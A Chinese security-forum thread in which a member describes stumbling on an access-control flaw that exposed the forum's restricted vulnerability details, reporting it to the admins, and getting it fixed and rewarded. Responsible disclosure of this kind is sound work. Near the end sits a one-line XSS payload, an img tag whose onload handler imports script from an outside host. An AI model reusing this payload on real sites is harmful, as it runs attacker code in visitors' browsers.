我不敢发出来,影响有点大,求私信联系
已经反馈给
admin@t00ls.net。
有道友问啥问题,争得管理大佬的同意后我简单说一下:
发现的过程很奇葩,我触控板失灵,瞎点到了论坛这篇帖子:
付费通(shfft.com)某分站命令执行漏洞,可getshell[T00ls-2019-00168]的页面上,然后回过来看发现漏洞细节全部出来了,当场懵逼。然后测试发现确实存在某处功能存在越权。可以直接浏览所有厂商漏洞预警板块漏洞细节。鉴于群里大佬多如牛毛,我也怕背锅,立马发帖发邮件告知管理。管理响应贼快

,立即修复了。还给了我100tubi奖励+微信一个好友位,太感谢了。
反馈后想对其他功能继续进行测试,由于忙于下班,仅测试了投稿文章,发现用那个action不能越权查看到高权限文章内容。不过从这枚问题可以发现强如吐司都有这类越权漏洞,我们平时挖不到洞的时候可以平静一下,相信有洞,就会有洞的。哈哈哈
看到还是有道友在问,管理大佬已经删掉那个功能了,我贴一个图吧:
有志者、事竟成,破釜沉舟
<Img Src=//x.is OnLoad=import(src)>
越权的话莫不是可以看到阅读权限高的帖子?既然修复了楼主发出来看看呗。